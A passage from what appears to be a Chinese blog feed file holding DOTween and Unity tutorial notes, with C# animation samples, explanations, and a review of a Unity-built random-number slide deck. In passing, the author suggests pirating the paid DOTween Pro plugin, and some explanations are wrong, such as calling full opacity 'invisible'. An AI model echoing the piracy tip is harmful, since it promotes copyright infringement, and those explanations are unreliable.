    1. 10 表示抖动的持续时间,单位为秒。在这个例子中,抖动将持续 10 秒钟。
    2. new Vector3(1, 1, 0) 表示抖动的强度向量。在这个例子中,物体在 X 轴和 Y 轴上的位置会以幅度为 1 的力度进行抖动,而在 Z 轴上的位置保持不变。

    综上所述,这段代码的含义是创建一个位置抖动的动画序列,让物体在 10 秒内以幅度为 1 的力度在 X 轴和 Y 轴上进行抖动,而 Z 轴的位置保持不变。执行该动画后,物体将在指定的持续时间内抖动。

    11-颜色和透明度动画

    jpg

    using DG.Tweening;
    using UnityEngine;
    using UnityEngine.UI;

    public class TextColorTween : MonoBehaviour
    {
    private Text text;
    // Start is called before the first frame update
    void Start()
    {
    text = GetComponent<Text>();
    text.DOColor(Color.red, 2);
    text.DOFade(1, 3);
    }
    }

    • text.DOColor(Color.red, 2);

      • 这段代码使用了 DOTween 插件来创建一个文本颜色变化的动画序列。

        text.DOColor(Color.red, 2) 是 DOTween 插件的扩展方法,用于创建一个文本颜色变化的动画序列。它接受两个参数:目标颜色和动画持续时间。

        1. Color.red 表示目标颜色,即要将文本变化为红色。
        2. 2 表示动画的持续时间,单位为秒。在这个例子中,文本的颜色将在 2 秒内逐渐变化为红色。

        综上所述,这段代码的含义是获取当前游戏对象上的 Text 组件,并创建一个文本颜色变化的动画序列,将文本的颜色逐渐变化为红色,并且动画持续时间为 2 秒。在执行该动画后,文本的颜色将会在指定的持续时间内渐变为红色。

    • text.DOFade(1, 3);

      • 这段代码使用了 DOTween 插件来创建一个文本透明度渐变的动画序列。

        text.DOFade(1, 3) 是 DOTween 插件的扩展方法,用于创建一个文本透明度渐变的动画序列。它接受两个参数:目标透明度和动画持续时间。

        1. 1 表示目标透明度,即将文本的透明度渐变为完全不透明(不可见)。
        2. 3 表示动画的持续时间,单位为秒。在这个例子中,文本的透明度将在 3 秒内逐渐渐变为完全不透明。

        综上所述,这段代码的含义是对获取到的 Text 组件创建一个文本透明度渐变的动画序列,将文本的透明度逐渐渐变为完全不透明,而动画的持续时间为 3 秒。执行该动画后,文本的透明度将会在指定的持续时间内逐渐增加,最终变为完全不透明。

    12-学习 DOTween 的官方文档

    可以读一读,看看 DOTween 都支持哪些功能。

    13-动画的组件可视化创建方式

    DOTween Animation 类,通过可视化的方式创建一个类。

    jpg

    同时再写一个类控制这个动画的逻辑:

    using DG.Tweening;
    using UnityEngine;

    public class Panel : MonoBehaviour
    {
    private DOTweenAnimation tweenAnimation;
    private bool isShow = false;
    // Start is called before the first frame update
    void Start()
    {
    tweenAnimation = GetComponent<DOTweenAnimation>();
    }

    public void OnClick()
    {
    if (isShow)
    {
    tweenAnimation.DOPlayBackwards();
    isShow = false;
    }
    else
    {
    tweenAnimation.DOPlayForward();
    isShow = true;
    }
    }
    }

    14-DOTweenPath 路径编辑器的使用

    介绍了 DOTween Path 类,让物体沿着某个路径进行移动:

    jpg

    也可以调用其中的函数:

    jpg

    ]]>
    + 资源

    课程

    01-DOTween 动画插件介绍和导入

    从 Untiy Assetstore DOTween Pro | 可视化脚本 | Unity Asset Store 下载 DoTween 要 $15……去网上整个盗版的吧。

    DOTween 官网,如果要详细学习,建议通读官网文档:

    官网上显示 DOTween 业界领先!

    jpg

    DOTween 可视作 HOTween 的 V2 版本。

    02-如何对变量进行动画

    场景里绑个类测试下:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    using UnityEngine;
    using DG.Tweening;

    public class GetStart : MonoBehaviour
    {
    public Vector3myValue = new Vector3(0, 0, 0);

    // Start is called before the first frame update
    void Start()
    {
    // 对变量做一个动画(通过插值的方式去修改一个值的变化)
    // 这个函数使用了 C# 的 lambda 表达式
    DOTween.To(() => myValue, x => myValue = x, new Vector3(10, 10, 10), 2);
    }
    }

    DOTween.To() 方法是 DOTween 插件中的一个静态方法,用于创建一个动画序列。它接受四个参数:起始值 Getter、更新值 Setter、目标值和动画持续时间。

    1. () => myValue 是一个 Lambda 表达式,表示获取当前的 myValue 值作为动画的起始值。这个值将在动画开始时被记录下来。
    2. x => myValue = x 也是一个 Lambda 表达式,表示将动画计算出的 x 值赋给 myValue。在动画执行的过程中,DOTween 将不断计算新的 x 值,并调用这个 Lambda 表达式来将其赋值给 myValue。
    3. new Vector3(10, 10, 10) 表示动画的目标值。在这个例子中,目标值是一个三维向量 (Vector3),具体数值为 (10, 10, 10)。
    4. 2 表示动画的持续时间,单位为秒。在这个例子中,动画将在 2 秒内从起始值过渡到目标值。

    综上所述,这行代码的含义是创建一个以 myValue 作为起始值的动画,将 myValue 从起始值逐渐过渡到目标值 Vector3(10, 10, 10),过渡时间为 2 秒。在动画过程中,myValue 将会不断更新,并且最终等于目标值。


    开跑!这个值变化的速率是先快后慢的。

    jpg

    03-控制Cube和UI面板的动画

    Update() 中,将 myValueCude Transform 绑定:

    jpg

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    using UnityEngine;
    using DG.Tweening;

    public class GetStart : MonoBehaviour
    {
    public Vector3 myValue = new Vector3(0, 0, 0);
    public Transform cubeTransform = null;

    // Start is called before the first frame update
    void Start()
    {
    // 对变量做一个动画(通过插值的方式去修改一个值的变化)
    // 这个函数使用了 C# 的 lambda 表达式
    DOTween.To(() => myValue, x => myValue = x, new Vector3(10, 10, 10), 2);
    }

    // Update is called once per frame
    void Update()
    {
    cubeTransform.position = myValue;
    }
    }

    同理,对于 UI 面板,在 Update() 中,将 myValuetaskPanelTransform 绑定:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    using UnityEngine;
    using DG.Tweening;

    public class GetStart : MonoBehaviour
    {
    public Vector3myValue = new Vector3(600, 0, 0);
    public Transform taskPanelTransform = null;

    // Start is called before the first frame update
    void Start()
    {
    DOTween.To(() => myValue, x => myValue = x, new Vector3(0, 0, 0), 2);
    }

    // Update is called once per frame
    void Update()
    {
    taskPanelTransform.localPosition = myValue;
    }
    }


    DOTween.To() 不仅适用于 Vector3float 也是适用的:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    using UnityEngine;
    using DG.Tweening;

    public class GetStart : MonoBehaviour
    {
    public float myValue2 = 0;

    // Start is called before the first frame update
    void Start()
    {
    // 对变量做一个动画(通过插值的方式去修改一个值的变化)
    // 这个函数使用了 C# 的 lambda 表达式
    DOTween.To(() => myValue2, x => myValue2 = x, 10, 2);
    }
    }

    04-动画的快捷播放方式

    Ctrl + N 可以直接创建一个新场景,学到了。


    设计一个按钮,按下后面板就移动到视图内:

    jpg

    下述方法对 UI 不好使:

    1
    2
    3
    4
    5
    6
    public void OnClick()
    {
    // 让 panelTransform 从当前位置 动画到 0, 0, 0 的位置,时间为 1 秒(修改的是世界坐标)
    // 可是我们 UI 上的是局部坐标啊?
    panelTransform.DOMove(new Vector3(0, 0, 0), 1);
    }

    我这个修改局部坐标的好使:

    1
    2
    3
    4
    public void OnClick()
    {
    panelTransform.DOLocalMove(new Vector3(0, 0, 0), 1);
    }

    05-动画的前放和倒放

    panelTransform.DOPlayBackwards(); 可以让绑定在 panelTransform 上的动画倒放。

    错误示范:

    由于 默认动画完成后会被销毁,所以在动画播放完后是不能倒放的。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    using UnityEngine;
    using DG.Tweening;

    public class MyButton : MonoBehaviour
    {
    public RectTransform panelTransform;
    private bool isIn = false;

    public void OnClick()
    {
    if (!isIn)
    {
    panelTransform.DOLocalMove(new Vector3(0, 0, 0), 1); // 默认动画完成后会被销毁
    // Tweener 对象保存这个动画的信息,每次调用 do 类型的方法都会创建一个 tweener 对象,这个对象是 dotween 来管理
    isIn = true;
    }
    else
    {
    panelTransform.DOPlayBackwards();
    isIn = false;
    }
    }
    }

    错误示范 2:

    DOLocalMove() 会创建一个 Tweener 对象,将自动销毁设为 false

    但是每次按一次按钮都会创建一个动画对象,造成资源浪费。

    jpg

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    using UnityEngine;
    using DG.Tweening;

    public class MyButton : MonoBehaviour
    {
    public RectTransform panelTransform;
    private bool isIn = false;

    public void OnClick()
    {
    if (!isIn)
    {
    Tweener tweener = panelTransform.DOLocalMove(new Vector3(0, 0, 0), 1); // 默认动画完成后会被销毁
    // Tweener 对象保存这个动画的信息,每次调用 do 类型的方法都会创建一个 tweener 对象,这个对象是 dotween 来管理
    tweener.SetAutoKill(false); // 把自动销毁设置为 false
    isIn = true;
    }
    else
    {
    panelTransform.DOPlayBackwards();
    isIn = false;
    }
    }
    }

    错误示范 3:

    tweener.Play() 只会让动画播放一次。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    using UnityEngine;
    using DG.Tweening;

    public class MyButton : MonoBehaviour
    {
    public RectTransform panelTransform;
    private bool isIn = false;
    private Tweener tweener;
    // Start is called before the first frame update
    void Start()
    {
    tweener = panelTransform.DOLocalMove(new Vector3(0, 0, 0), 1); // 默认动画完成后会被销毁
    // Tweener 对象保存这个动画的信息,每次调用 do 类型的方法都会创建一个 tweener 对象,这个对象是 dotween 来管理
    tweener.SetAutoKill(false); // 把自动销毁设置为 false
    tweener.Pause();
    }

    public void OnClick()
    {
    if (!isIn)
    {
    tweener.Play();
    isIn = true;
    }
    else
    {
    panelTransform.DOPlayBackwards();
    isIn = false;
    }
    }
    }

    正确示范:

    DOPlayForward() 是正放,与 DOPlayBackwards() 相对应。

    执行 panelTransform.DOPlayForward() 会执行这个对象上关联的所有动画。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    using UnityEngine;
    using DG.Tweening;

    public class MyButton : MonoBehaviour
    {
    public RectTransform panelTransform;
    private bool isIn = false;
    // Start is called before the first frame update
    void Start()
    {
    Tweener tweener = panelTransform.DOLocalMove(new Vector3(0, 0, 0), 1); // 默认动画完成后会被销毁
    // Tweener 对象保存这个动画的信息,每次调用 do 类型的方法都会创建一个 tweener 对象,这个对象是 dotween 来管理
    tweener.SetAutoKill(false); // 把自动销毁设置为 false
    tweener.Pause();
    }

    // Update is called once per frame
    void Update()
    {

    }

    public void OnClick()
    {
    if (!isIn)
    {
    panelTransform.DOPlayForward(); // 前放
    isIn = true;
    }
    else
    {
    panelTransform.DOPlayBackwards(); // 倒放
    isIn = false;
    }
    }
    }

    06-From Tweens

    给一个 Cube 对象绑定代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    using UnityEngine;
    using DG.Tweening;

    public class MyCube : MonoBehaviour
    {
    // Start is called before the first frame update
    void Start()
    {
    // 默认是从当前位置移动到目标位置 加上 From() 方法以后表示从目标位置移动到当前位置
    transform.DOMoveX(5, 3).From(true);
    }
    }

    transform.DOMoveX(5, 3) 方法是 DOTween 插件的扩展方法,用于创建一个移动物体的动画序列。它接受两个参数:目标位置和动画持续时间。

    1. 5 表示物体移动的目标位置。在这个例子中,目标位置是X轴上的坐标为5。
    2. 3 表示动画的持续时间,单位为秒。在这个例子中,动画将在3秒内完成物体从当前位置到目标位置的移动。

    .From(true) 是 DOTween 链式调用中的一个方法,表示将动画的起始位置设置为目标位置,并且播放反转动画。这意味着物体将从目标位置开始沿着 X 轴反向移动至当前位置,然后再回到目标位置。

    综上所述,这行代码的含义是创建一个物体移动的动画序列,让物体从当前位置开始沿着 X 轴移动到坐标为 5 的位置,移动时间为 3 秒,并且以目标位置为起点,播放反转动画使物体从目标位置返回当前位置。

    07-动画的属性设置(动画曲线和事件函数)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    using UnityEngine;
    using DG.Tweening;

    public class MyPanel : MonoBehaviour
    {
    // Start is called before the first frame update
    void Start()
    {
    Tweener tweener = transform.DOLocalMoveX(0, 2);
    tweener.SetEase(Ease.OutBack);
    tweener.SetLoops(2);
    tweener.OnComplete(OnTweenComplete);
    }

    void OnTweenComplete()
    {
    Debug.Log("动画播放完成了");
    }
    }

    这段代码使用了 DOTween 插件来创建一个移动物体的动画序列,并设置了一些额外的效果和回调函数。

    1. transform.DOLocalMoveX(0, 2) 是 DOTween 插件的扩展方法,用于创建一个将物体在本地坐标系下沿着 X 轴移动到指定位置的动画序列。它接受两个参数:目标位置和动画持续时间。
      • 0 表示物体移动的目标位置。在这个例子中,目标位置是 X 轴上的坐标为 0。
      • 2 表示动画的持续时间,单位为秒。在这个例子中,动画将在 2 秒内完成物体从当前位置到目标位置的移动。
    2. tweener.SetEase(Ease.OutBack) 是设置动画的缓动效果。Ease.OutBack 表示应用一种反弹效果的缓动曲线,使得动画在结束时会有一个回弹的效果。
    3. tweener.SetLoops(2) 是设置动画的循环次数。这里将动画循环播放 2 次,即播放完正向动画后再重新播放一次。
    4. tweener.OnComplete(OnTweenComplete) 是设置动画完成时的回调函数。OnTweenComplete 是一个自定义的回调函数,在动画完成时将被调用。

    综上所述,这段代码的含义是创建一个物体移动的动画序列,让物体在本地坐标系下沿着 X 轴移动到坐标为 0 的位置,移动时间为 2 秒。动画应用反弹效果的缓动曲线,循环播放两次。当动画完成时,将调用自定义的回调函数 OnTweenComplete

    08-动画的生命周期和生命周期函数

    A tween’s life

    • When you create a tween it will play automatically (unless you change the global defaultAutoPlay behaviour) until it completes all its loops.

    • When a tween is complete it is automatically killed (unless you change the global defaultAutoKill behaviour), which means you won’t be able to use it anymore.

    • If you want to reuse the same tween, just set its autoKill behaviour to FALSE (either by changing the global autoKill settings for all tweens, or by chaining SetAutoKill(false) to your tween).

    • If your tween’s target becomes NULL while a tween is playing errors might happen. You’ll have to either be careful or activate the safe mode


    emmm 其它的还是叫我去看文档。

    09-对话框文字动画

    jpg

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    using UnityEngine;
    using UnityEngine.UI;
    using DG.Tweening;

    public class MyText : MonoBehaviour
    {
    private Text text;
    // Start is called before the first frame update
    void Start()
    {
    text = this.GetComponent<Text>();
    text.DOText("接下来,我们进入第二篇章", 5);
    }
    }

    这段代码使用了 DOTween 插件来创建一个文本逐字显示的动画序列。

    1. text = this.GetComponent<Text>() 用于获取当前游戏对象(GameObject)上的 Text 组件。这样可以通过 text 变量来引用该组件。
    2. text.DOText("接下来,我们进入第二篇章", 5) 是 DOTween 插件的扩展方法,用于创建一个逐字显示文本的动画序列。它接受两个参数:目标文本和动画持续时间。
      • "接下来,我们进入第二篇章" 是目标文本,即要逐字显示的文本内容。
      • 5 是动画的持续时间,单位为秒。在这个例子中,文本将会在 5 秒内逐字显示完整。

    综上所述,这段代码的含义是获取当前游戏对象上的 Text 组件并创建一个逐字显示文本的动画序列,将文本内容逐字显示为 “接下来,我们进入第二篇章”,并且动画持续时间为 5 秒。这样,在播放动画期间,文本将会逐字逐渐显示出来。

    10-屏幕震动效果

    给 Camera 添加一个类:

    jpg

    这段代码使用了 DOTween 插件来创建一个位置抖动的动画序列。

    transform.DOShakePosition(10, new Vector3(1, 1, 0)) 是 DOTween 插件的扩展方法,用于创建一个物体位置抖动的动画序列。它接受两个参数:抖动的持续时间和抖动的强度向量。

    1. 10 表示抖动的持续时间,单位为秒。在这个例子中,抖动将持续 10 秒钟。
    2. new Vector3(1, 1, 0) 表示抖动的强度向量。在这个例子中,物体在 X 轴和 Y 轴上的位置会以幅度为 1 的力度进行抖动,而在 Z 轴上的位置保持不变。

    综上所述,这段代码的含义是创建一个位置抖动的动画序列,让物体在 10 秒内以幅度为 1 的力度在 X 轴和 Y 轴上进行抖动,而 Z 轴的位置保持不变。执行该动画后,物体将在指定的持续时间内抖动。

    11-颜色和透明度动画

    jpg

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    using DG.Tweening;
    using UnityEngine;
    using UnityEngine.UI;

    public class TextColorTween : MonoBehaviour
    {
    private Text text;
    // Start is called before the first frame update
    void Start()
    {
    text = GetComponent<Text>();
    text.DOColor(Color.red, 2);
    text.DOFade(1, 3);
    }
    }

    • text.DOColor(Color.red, 2);

      • 这段代码使用了 DOTween 插件来创建一个文本颜色变化的动画序列。

        text.DOColor(Color.red, 2) 是 DOTween 插件的扩展方法,用于创建一个文本颜色变化的动画序列。它接受两个参数:目标颜色和动画持续时间。

        1. Color.red 表示目标颜色,即要将文本变化为红色。
        2. 2 表示动画的持续时间,单位为秒。在这个例子中,文本的颜色将在 2 秒内逐渐变化为红色。

        综上所述,这段代码的含义是获取当前游戏对象上的 Text 组件,并创建一个文本颜色变化的动画序列,将文本的颜色逐渐变化为红色,并且动画持续时间为 2 秒。在执行该动画后,文本的颜色将会在指定的持续时间内渐变为红色。

    • text.DOFade(1, 3);

      • 这段代码使用了 DOTween 插件来创建一个文本透明度渐变的动画序列。

        text.DOFade(1, 3) 是 DOTween 插件的扩展方法,用于创建一个文本透明度渐变的动画序列。它接受两个参数:目标透明度和动画持续时间。

        1. 1 表示目标透明度,即将文本的透明度渐变为完全不透明(不可见)。
        2. 3 表示动画的持续时间,单位为秒。在这个例子中,文本的透明度将在 3 秒内逐渐渐变为完全不透明。

        综上所述,这段代码的含义是对获取到的 Text 组件创建一个文本透明度渐变的动画序列,将文本的透明度逐渐渐变为完全不透明,而动画的持续时间为 3 秒。执行该动画后,文本的透明度将会在指定的持续时间内逐渐增加,最终变为完全不透明。

    12-学习 DOTween 的官方文档

    可以读一读,看看 DOTween 都支持哪些功能。

    13-动画的组件可视化创建方式

    DOTween Animation 类,通过可视化的方式创建一个类。

    jpg

    同时再写一个类控制这个动画的逻辑:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    using DG.Tweening;
    using UnityEngine;

    public class Panel : MonoBehaviour
    {
    private DOTweenAnimation tweenAnimation;
    private bool isShow = false;
    // Start is called before the first frame update
    void Start()
    {
    tweenAnimation = GetComponent<DOTweenAnimation>();
    }

    public void OnClick()
    {
    if (isShow)
    {
    tweenAnimation.DOPlayBackwards();
    isShow = false;
    }
    else
    {
    tweenAnimation.DOPlayForward();
    isShow = true;
    }
    }
    }

    14-DOTweenPath 路径编辑器的使用

    介绍了 DOTween Path 类,让物体沿着某个路径进行移动:

    jpg

    也可以调用其中的函数:

    jpg

    ]]>
    @@ -5013,7 +5013,7 @@ /posts/Unity-%E5%9B%9E%E9%A1%BE%E4%B8%80%E4%B8%8B%E8%AE%A9%E8%80%81%E5%B8%88%E9%9C%87%E6%83%8A%E7%9A%84%20PPT/ - 前言

    ​ 回顾下之前用 Unity 写的 PPT 吧!太久没有用 Unity 了,熟悉又陌生。

    正文

    随机数

    ​ 刚进校因为疫往情深而被关在宿舍,刚好还要线上上课汇报而创作的作品!

    1

    jpg

    场景切换器

    jpg

    using CodeMonkey.Utils;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.SceneManagement;
    using UnityEngine.UI;

    public class ScenesController : MonoBehaviour
    {
    [SerializeField] private GameObject scenesControllerUIPrefab;
    [SerializeField] private GameObject leftUIPrefab;
    [SerializeField] private GameObject rightUIPrefab;
    private int scenesNum = 6;
    private int sceneIndex = 1;
    public static ScenesController instance;
    private GameObject UIGameObject;
    private GameObject leftUIGameObject;
    private GameObject rightUIGameObject;

    private bool enterScene = false;
    private bool exitScene = false;
    private float timer = 2f;
    private float waitTime = 1f;
    private float enterSceneTime = 1f;
    private float exitSceneTime = 1f;
    // Start is called before the first frame update
    void Awake()
    {
    if (FindObjectsOfType<ScenesController>().Length > 1)
    {
    Destroy(gameObject);
    return;
    }
    instance = this;
    DontDestroyOnLoad(gameObject);
    initUI();
    // enterScene = true;
    }

    void Update()
    {
    if (!GameObject.Find("Canvas").transform.Find("ScenesControllerUI"))
    {
    timer = enterSceneTime + waitTime;
    initUI();
    // enterScene = true;
    }
    }

    private void initUI()
    {
    Debug.Log("initUI()");
    UIGameObject = Instantiate(scenesControllerUIPrefab);
    UIGameObject.name = "ScenesControllerUI";
    UIGameObject.transform.SetParent(GameObject.Find("Canvas").transform);
    UIGameObject.transform.Find("PriorBtn").GetComponent<Button_UI>().ClickFunc = () => { onPriorBtn(); };
    UIGameObject.transform.Find("NextBtn").GetComponent<Button_UI>().ClickFunc = () => { onNextBtn(); };
    UIGameObject.transform.Find("Text").GetComponent<Text>().text = sceneIndex + "/" + scenesNum;
    }

    private void onNextBtn()
    {
    sceneIndex++;
    if (sceneIndex == scenesNum + 1)
    sceneIndex = 1;
    //timer = exitSceneTime;
    //exitScene = true;
    SceneManager.LoadScene(sceneIndex.ToString());
    }

    private void onPriorBtn()
    {
    sceneIndex--;
    if (sceneIndex == 0)
    sceneIndex = scenesNum;
    //timer = exitSceneTime;
    //exitScene = true;
    SceneManager.LoadScene(sceneIndex.ToString());
    }
    }

    旋转的轮盘

    ​ 一页 PPT 就是一个 Scene,设置一个 DontDestroyOnLoad(gameObject); 的场景切换器来切换场景。

    jpg

    ​ 用 Animation 组件控制的会旋转的轮盘。

    2

    jpg

    数学公式

    ​ 数学公式是在 在线 LaTeX 公式编辑器-编辑器 (latexlive.com) 输出的图片来显示的。

    滚动代码

    jpg

    ​ 一大坨代码放不下一页中,设计了一个滚动条。

    <color="#3f93c2">using</color> System;

    <color="#3f93c2">public class</color> <color="#4ec9b0">RandomNumber</color>
    {
    <color="#3f93c2">private ulong</color> maxshort =<color="#b5cea8"> 65536L</color>;
    <color="#3f93c2">private ulong</color> <color="#ffc0c0">multiplier</color> = <color="#b5cea8">1194211693L</color>;
    <color="#3f93c2">private ulong</color> <color="#ffc0c0">adder</color> = <color="#b5cea8">12345L</color>;
    <color="#3f93c2">private ulong </color><color="#ffc0c0">randSeed</color>;

    <color="#588841">/// <summary>
    /// 构造函数
    /// </summary></color>
    <color="#3f93c2">public</color> <color="#4ec9b0">RandomNumber</color>(<color="#3f93c2">ulong</color> <color="#93d9fe">multiplier</color>, <color="#3f93c2">ulong</color> <color="#93d9fe">adder</color>, <color="#3f93c2">ulong</color> <color="#93d9fe">randSeed</color> = <color="#b5cea8">0</color>)
    {
    <color="#3f93c2">this</color>.multiplier = <color="#93d9fe">multiplier</color>;
    <color="#3f93c2">this</color>.adder = <color="#93d9fe">adder</color>;
    <color="#d8a0df">if</color> (<color="#93d9fe">randSeed</color> == <color="#b5cea8"> 0</color>)
    <color="#57a648">// 返回自 1970-01-01T00:00:00.000Z 起已经过的毫秒数。</color>
    <color="#3f93c2">this</color>.randSeed = (<color="#3f93c2">ulong</color>)<color="#63ba86">DateTime</color>.Now.<color="#dcdcaa">ToFileTimeUtc</color>();
    <color="#d8a0df">else</color>
    <color="#3f93c2">this</color>.randSeed = <color="#93d9fe">randSeed</color>;
    }

    <color="#588841">/// <summary>
    /// 产生 0 到 n - 1 之间的随机整数
    /// 每次计算时, 用线性同余式计算新的种子 randSeed,
    /// 其高 16 为的随机性较好
    /// 此时得到一个 0 ~ 65535 之间的随机整数,
    /// 再将此随机整数映射到 0 ~ n - 1 范围内.
    /// </summary>
    /// <param </color>name<color="#588841">=</color>"<color="#93d9fe">n</color>"<color="#588841">>产生的随机整数上限</param>
    /// <returns>产生的随机整数</returns></color>
    <color="#3f93c2">public ushort</color> <color="#dcdcaa">Random</color>(<color="#3f93c2">ulong</color> <color="#93d9fe">n</color>)
    {
    randSeed = multiplier * randSeed + adder;
    <color="#d8a0df">return</color> (<color="#3f93c2">ushort</color>)((randSeed >> <color="#b5cea8">48</color>) % <color="#93d9fe">n</color>); <color="#57a648">// 取高 16 位</color>
    }

    <color="#588841">/// <summary>
    /// 产生 [0, 1) 之间的随机浮点数
    /// </summary>
    /// <returns>产生的随机浮点数</returns></color>
    <color="#3f93c2">public double</color> <color="#dcdcaa">fRandom</color>()
    {
    <color="#d8a0df">return</color> <color="#dcdcaa">Random</color>(maxshort) / (<color="#3f93c2">double</color>)maxshort;
    }
    }

    ​ 为了让代码高亮,一个一个填的富文本标签……

    3

    jpg

    创建随机数

    ​ 随便创了个 Scene3Controller 类来控制这个场景里的所有逻辑,有点屎山的味道:

    • Update() 里切换的时钟
    • 仿照课本,用 randSeedmultiplieraddern 创建随机数。
    • 将随机数显示在屏幕上,当时为了写出这个隔半秒显示一行的效果还请教了小迷糊,使用了协程 IEnumrator,当年 RMXP 一句话的事情 orz。
    using CodeMonkey.Utils;
    using System.Collections;
    using System.Collections.Generic;
    using System.Reflection;
    using UnityEngine;
    using UnityEngine.UI;

    public class Scene3Controller : MonoBehaviour
    {
    [SerializeField] private GameObject inputField;
    [SerializeField] private Button_UI startBtn;
    [SerializeField] private Image startImage;
    [SerializeField] private Image stopImage;
    [SerializeField] private Text screenText;
    [SerializeField] private RectTransform clockPointer;

    private RandomNumber randomNumber = null;
    private ulong multiplier = 1194211693L;
    private ulong adder = 12345L;
    private ulong randSeed = 0;
    private ulong n = 65536L;

    private bool running = false;
    private float timer = 0;

    // Start is called before the first frame update
    void Awake()
    {
    screenText.text = "";
    inputField.transform.Find("randSeed").GetComponent<InputField>().text = "" + randSeed;
    inputField.transform.Find("multiplier").GetComponent<InputField>().text = "" + multiplier;
    inputField.transform.Find("adder").GetComponent<InputField>().text = "" + adder;
    inputField.transform.Find("n").GetComponent<InputField>().text = "" + n;

    startBtn.ClickFunc = () => {
    if (running)
    {
    StopCoroutine("TestProgram");
    }
    else
    {
    try
    {
    multiplier = ulong.Parse(inputField.transform.Find("multiplier").GetComponent<InputField>().text);
    adder = ulong.Parse(inputField.transform.Find("adder").GetComponent<InputField>().text);
    randSeed = ulong.Parse(inputField.transform.Find("randSeed").GetComponent<InputField>().text);
    n = ulong.Parse(inputField.transform.Find("n").GetComponent<InputField>().text);
    randomNumber = new RandomNumber(multiplier, adder, randSeed);
    }
    catch
    {
    Debug.Log("失败!");
    randomNumber = new RandomNumber(multiplier, adder, randSeed);
    }
    startBtn.hoverBehaviour_Image = stopImage;
    StartCoroutine("TestProgram");
    }
    stopImage.gameObject.SetActive(!running);
    startImage.gameObject.SetActive(running);
    running = !running;
    };
    }

    // Update is called once per frame
    void Update()
    {
    try
    {
    if (ulong.Parse(inputField.transform.Find("randSeed").GetComponent<InputField>().text) == 0)
    {
    inputField.transform.Find("randSeed").Find("Text").GetComponent<Text>().color = new Color(1, 0.75f, 0.75f);
    }
    else
    {
    inputField.transform.Find("randSeed").Find("Text").GetComponent<Text>().color = new Color(181f / 255f, 206f / 255f, 168 / 255f);
    }
    }
    catch
    {
    inputField.transform.Find("randSeed").Find("Text").GetComponent<Text>().color = new Color(181f / 255f, 206f / 255f, 168 / 255f);
    }

    if(timer<1f)
    {
    timer += Time.deltaTime;
    }
    else
    {
    timer = 0f;
    clockPointer.Rotate(new Vector3(0, 0, -90));
    }

    }

    /// <summary>
    /// 测试程序
    /// </summary>
    private IEnumerator TestProgram()
    {
    screenText.text = "";
    for (int i=0;i<10;i++)
    {
    screenText.text += "a<size=20>"+ i + "</size>=" + randomNumber.Random2(n) + "\n";
    yield return new WaitForSeconds(.5f);
    }
    stopImage.gameObject.SetActive(!running);
    startImage.gameObject.SetActive(running);
    running = !running;
    }
    }

    4

    jpg

    平方取中法

    ​ 仿照课本写的平方取中法,数字中间的部分蓝色高亮。

    jpg

    using System.Collections;
    using System.Collections.Generic;
    using UnityEditor;
    using UnityEngine;
    using UnityEngine.UI;

    public class MiddleSquareMethod : MonoBehaviour
    {
    private int length = 6;
    private ulong num = 675248L;
    private string str = "";
    private Text text;
    private float timer = 0;
    // Start is called before the first frame update
    void Awake()
    {
    text = GetComponent<Text>();
    }

    // Update is called once per frame
    void Update()
    {
    if(timer < 1f)
    {
    timer += Time.deltaTime;
    }
    else
    {
    timer = 0f;
    str = "";
    for (int i = 0; i < 2 * length - (num * num).ToString().Length; i++)
    {
    str += "0";
    }
    Debug.Log(str);
    str += (num * num).ToString();
    num = ulong.Parse(str.Substring(length / 2, length));
    text.text = str.Substring(0, length / 2) + "<color=\"#0000ff\">" + str.Substring(length / 2, length) + "</color>" + str.Substring(3 * length / 2, length / 2);
    }
    }
    }

    5

    jpg

    数据可视化

    ​ 从 Create a Graph - Unity Tutorial - YouTube 整的一份 Unity 下画曲线图和柱状图的东东。

    jpg

    using System;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UI;
    using CodeMonkey.Utils;

    public class Window_Graph : MonoBehaviour {

    public static Window_Graph instance;

    [SerializeField] private Sprite dotSprite;
    private RectTransform graphContainer;
    private RectTransform labelTemplateX;
    private RectTransform labelTemplateY;
    private RectTransform dashContainer;
    private RectTransform dashTemplateX;
    private RectTransform dashTemplateY;
    private List<GameObject> gameObjectList;
    private List<IGraphVisualObject> graphVisualObjectList;
    private GameObject tooltipGameObject;
    private List<RectTransform> yLabelList;

    // Cached values
    public List<int> valueList;
    private IGraphVisual graphVisual;
    private int maxVisibleValueAmount;
    private Func<int, string> getAxisLabelX;
    private Func<float, string> getAxisLabelY;
    private float xSize;
    [SerializeField] private bool startYScaleAtZero = true;

    private void Awake() {
    instance = this;
    // Grab base objects references
    graphContainer = transform.Find("graphContainer").GetComponent<RectTransform>();
    labelTemplateX = graphContainer.Find("labelTemplateX").GetComponent<RectTransform>();
    labelTemplateY = graphContainer.Find("labelTemplateY").GetComponent<RectTransform>();
